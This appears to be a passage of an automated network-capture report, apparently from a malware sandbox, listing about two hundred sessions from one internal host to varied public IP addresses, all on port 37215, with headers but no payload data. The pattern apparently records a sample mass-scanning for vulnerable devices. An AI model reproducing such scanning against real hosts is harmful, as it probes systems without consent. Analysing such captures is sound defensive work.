                                                  16268192.168.2.1337348157.6.115.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16269192.168.2.1356404197.195.176.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16270192.168.2.1348676157.31.119.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16271192.168.2.1354546157.166.201.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16272192.168.2.133702441.168.154.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16273192.168.2.1352668112.85.138.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16274192.168.2.1345528157.222.16.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16275192.168.2.134353041.213.59.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16276192.168.2.1339244157.215.203.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16277192.168.2.1350464197.7.138.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16278192.168.2.1349728157.144.26.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16279192.168.2.1337060197.201.109.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16280192.168.2.1348012120.81.31.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16281192.168.2.133997441.158.76.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16282192.168.2.1343310157.3.178.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16283192.168.2.13451761.2.89.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16284192.168.2.135289041.192.2.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16285192.168.2.1355304132.15.153.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16286192.168.2.1337070105.252.74.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16287192.168.2.1345252132.74.50.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16288192.168.2.1338516178.49.220.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16289192.168.2.1350046157.113.115.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16290192.168.2.1357756100.241.112.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16291192.168.2.134087447.130.74.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16292192.168.2.1345678197.30.156.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16293192.168.2.1338552121.149.241.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16294192.168.2.133594641.178.57.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16295192.168.2.1355266197.249.51.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16296192.168.2.135758241.192.116.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16297192.168.2.1346326175.207.239.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16298192.168.2.1337052157.200.0.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16299192.168.2.1353694197.178.167.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16300192.168.2.133291467.56.224.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16301192.168.2.1347504197.52.193.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16302192.168.2.1352204157.73.194.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16303192.168.2.134549441.140.221.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16304192.168.2.1350694157.147.234.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16305192.168.2.1354580157.71.15.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16306192.168.2.135298041.16.179.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16307192.168.2.1340792197.35.99.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16308192.168.2.133824295.63.241.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16309192.168.2.1357658197.105.47.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16310192.168.2.1335768157.113.74.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16311192.168.2.1343148157.134.170.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16312192.168.2.1347606157.206.220.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16313192.168.2.1350790200.130.26.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16314192.168.2.1352480158.230.240.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16315192.168.2.1356862157.14.18.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16316192.168.2.1352326197.10.93.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16317192.168.2.1337198157.255.252.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16318192.168.2.1360622181.233.63.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16319192.168.2.1342334197.30.130.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16320192.168.2.134192441.77.186.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16321192.168.2.1352468157.98.111.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16322192.168.2.1350658157.206.175.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16323192.168.2.1350954157.222.136.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16324192.168.2.1346576157.126.40.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16325192.168.2.135301241.134.232.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16326192.168.2.1348450145.28.188.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16327192.168.2.1352722197.124.112.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16328192.168.2.1336808157.146.15.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16329192.168.2.133346041.98.253.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16330192.168.2.134175638.142.187.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16331192.168.2.133548849.33.107.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16332192.168.2.1343320157.171.36.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16333192.168.2.1356506217.169.175.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16334192.168.2.1360258157.27.124.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16335192.168.2.1346108197.118.255.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16336192.168.2.135447041.198.1.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16337192.168.2.1335122157.22.126.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16338192.168.2.133847841.171.198.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16339192.168.2.134761041.9.10.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16340192.168.2.1353402177.9.66.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16341192.168.2.136055241.187.183.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16342192.168.2.134637441.143.158.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16343192.168.2.1352582157.138.167.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16344192.168.2.134179635.50.43.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16345192.168.2.134476641.241.92.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16346192.168.2.135578038.186.237.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16347192.168.2.1355036157.156.24.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16348192.168.2.1334576197.44.40.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16349192.168.2.134036040.5.93.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16350192.168.2.1332808157.217.33.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16351192.168.2.134728241.81.151.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16352192.168.2.1336394197.77.63.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16353192.168.2.133517439.70.24.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16354192.168.2.134545441.153.98.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16355192.168.2.1341000197.20.170.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16356192.168.2.134330654.182.208.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16357192.168.2.1350316157.44.160.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16358192.168.2.1360488109.6.29.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16359192.168.2.133574841.198.201.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16360192.168.2.134176641.38.140.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16361192.168.2.1360926157.241.115.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16362192.168.2.134414441.193.214.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16363192.168.2.135287457.2.232.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16364192.168.2.1352922197.44.105.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16365192.168.2.1358994197.169.98.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16366192.168.2.1344886157.108.99.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16367192.168.2.1351612157.95.29.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16368192.168.2.1332836157.89.45.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16369192.168.2.135366651.20.168.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16370192.168.2.1358856157.208.215.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16371192.168.2.1345694157.81.226.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16372192.168.2.1340548157.133.90.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16373192.168.2.135527677.123.174.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16374192.168.2.135896841.234.44.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16375192.168.2.133658841.250.4.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16376192.168.2.1346418197.37.143.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16377192.168.2.1333330157.44.147.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16378192.168.2.135080241.111.3.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16379192.168.2.1337504197.192.58.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16380192.168.2.1351954157.58.221.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16381192.168.2.1333442149.250.13.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16382192.168.2.133849841.210.55.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16383192.168.2.1336158157.141.209.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16384192.168.2.1336340197.232.51.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16385192.168.2.1344518157.173.68.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16386192.168.2.1347202125.141.130.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16387192.168.2.1351820165.172.80.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16388192.168.2.1358106157.173.254.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16389192.168.2.1359930157.4.185.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16390192.168.2.134383641.107.32.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16391192.168.2.135785441.135.151.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16392192.168.2.1360254155.234.93.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16393192.168.2.1339898197.38.102.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16394192.168.2.135704641.231.169.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16395192.168.2.1341106197.230.15.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16396192.168.2.134722441.32.126.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16397192.168.2.134179441.167.243.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16398192.168.2.1342100197.221.207.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16399192.168.2.1349300183.22.195.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16400192.168.2.1339728157.84.45.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16401192.168.2.1340374103.59.69.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16402192.168.2.1345332157.230.87.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16403192.168.2.133658032.100.126.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16404192.168.2.1347770157.151.171.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16405192.168.2.135563485.5.65.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16406192.168.2.1334894157.70.217.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16407192.168.2.1359094157.125.17.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16408192.168.2.135523841.184.178.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16409192.168.2.1352596157.238.131.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16410192.168.2.1346774184.163.121.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16411192.168.2.134666427.26.91.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16412192.168.2.134983273.33.166.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16413192.168.2.135945241.225.35.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16414192.168.2.1349044157.10.68.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16415192.168.2.134986841.26.54.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16416192.168.2.135585841.109.69.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16417192.168.2.1358746157.64.162.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16418192.168.2.1344404197.252.228.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16419192.168.2.1350184119.103.15.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16420192.168.2.1360940157.248.72.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16421192.168.2.1335090157.142.138.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16422192.168.2.1350456197.152.229.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16423192.168.2.1348158197.187.178.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16424192.168.2.1351370126.129.235.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16425192.168.2.1336656157.240.8.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16426192.168.2.1360148157.103.110.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16427192.168.2.135237641.26.174.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16428192.168.2.134942041.57.85.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16429192.168.2.134139619.107.250.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16430192.168.2.1332882209.122.114.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16431192.168.2.1355568157.191.145.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16432192.168.2.1344314157.214.49.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16433192.168.2.1336516157.68.184.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16434192.168.2.135894065.248.52.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16435192.168.2.1350236188.27.212.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16436192.168.2.1348136126.191.176.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16437192.168.2.135809841.184.100.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16438192.168.2.1336116157.15.170.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16439192.168.2.1351950157.121.183.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16440192.168.2.1356588197.84.122.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16441192.168.2.1351126157.231.119.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16442192.168.2.1352722197.202.108.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16443192.168.2.135569041.1.57.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16444192.168.2.1351566157.134.85.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16445192.168.2.1351658112.74.245.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16446192.168.2.1343756157.136.39.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16447192.168.2.1356142197.122.36.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16448192.168.2.1350852197.47.7.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16449192.168.2.1353150157.230.213.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16450192.168.2.1357784197.248.245.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16451192.168.2.1356292197.2.190.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16452192.168.2.1340906157.180.247.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16453192.168.2.1351954137.168.156.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16454192.168.2.1342494157.99.184.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16455192.168.2.1349436197.239.170.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16456192.168.2.1353326129.66.219.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16457192.168.2.1340524157.230.171.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16458192.168.2.1343612157.94.208.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16459192.168.2.1356472157.155.121.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16460192.168.2.135549641.13.141.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16461192.168.2.1345754197.53.237.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16462192.168.2.134220441.75.238.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16463192.168.2.135534641.207.190.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16464192.168.2.1342742197.51.72.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16465192.168.2.1350072157.70.195.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16466192.168.2.134519441.58.111.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16467192.168.2.1343586212.3.124.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16468192.168.2.1353374128.18.242.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16469192.168.2.133776041.224.68.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16470192.168.2.1337192135.69.55.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16471192.168.2.135247441.177.77.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16472192.168.2.1353384197.136.2.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16473192.168.2.134213245.44.230.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16474192.168.2.1339468197.218.96.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16475192.168.2.133541241.228.210.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16476192.168.2.133725441.5.1.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16477192.168.2.1354074115.143.89.17937215
